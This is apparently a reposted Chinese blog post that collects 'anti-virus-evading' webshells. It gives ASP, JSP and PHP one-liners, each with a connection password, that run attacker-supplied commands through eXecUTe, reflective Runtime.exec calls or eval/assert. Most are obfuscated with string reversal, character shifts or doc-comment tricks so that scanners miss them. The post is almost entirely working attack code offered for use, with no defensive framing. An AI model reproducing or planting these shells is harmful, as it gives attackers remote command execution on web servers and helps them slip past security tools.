记录一些免杀小马
Posted 思源湖的鱼
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记录一些免杀小马相关的知识,希望对你有一定的参考价值。
前言
记录些免杀小马,可能随着时间有些会失效
1、ASP
ASP连接密码均为99999
<%
dim a(5)
a(0)=request("99999")
eXecUTe(a(0))
%>
<%
Function b():
b = request("99999")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
<%
Class zzz
private yyy
Private Sub Class_Initialize
yyy = ""
End Sub
public property let www(yyy)
execute(yyy)
end property
End Class
Set xxx= New zzz
dim vvv(7)
vvv(2)=request("99999")
xxx.www= vvv(2)
%>
<%
Function x():
x = request("99999")
End Function
y = Mid(x(),1)
z = y&""
eXecUTe(z)
%>
<%
Function x():
x = request("99999")
End Function
y = Left(x(),99999)
eXecUTe(y)
%>
2、JSP
JSP连接密码均为x
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
String x = request.getParameter("x");
if(x!=null){
Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
Method gr = rt.getMethod(reverseStr("emitnuRteg"));
Method ex = rt.getMethod(reverseStr("cexe"), String.class);
Process e = (Process) ex.invoke(gr.invoke(null), x);
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String plusStr(String str){String plus = "";int length = str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);
if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}
else if(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}
else{plus=plus+z;}}return plus;}
%>
<%
String x = request.getParameter("x");
if(x!=null){
Class rt = Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));
Method gr = rt.getMethod(plusStr("dbqRrkqfjb"));
Method ex = rt.getMethod(plusStr("bubz"), String.class);
Process e = (Process) ex.invoke(gr.invoke(null),x);
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String eStr(String str){String result = "";int length = str.length();for (int i = 0; i < length; i++){char z=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%>
<%
if(request.getParameter("x")!=null){Class rt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));
Process e = (Process) rt.getMethod(new String(eStr("j}jh")), String.class).invoke(rt.getMethod(new String(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}), request.getParameter("x") );
java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];
out.print("");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("");}
%>
3、php
PHP连接密码均为1
<?php
$a=end($_REQUEST);
eval($a);
?>
<?php
$a = substr_replace("asse00","rt",4);
$b=array($array=array(''=>$a($_GET['1'])));
var_dump($b);
?>
<?php
/**
* assert($_GET[1+0]);
*/
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
assert($d);
?>
结语
做记录而已
以上是关于记录一些免杀小马的主要内容,如果未能解决你的问题,请参考以下文章
2017-2018-2 20155230《网络对抗技术》实验3:免杀原理与实践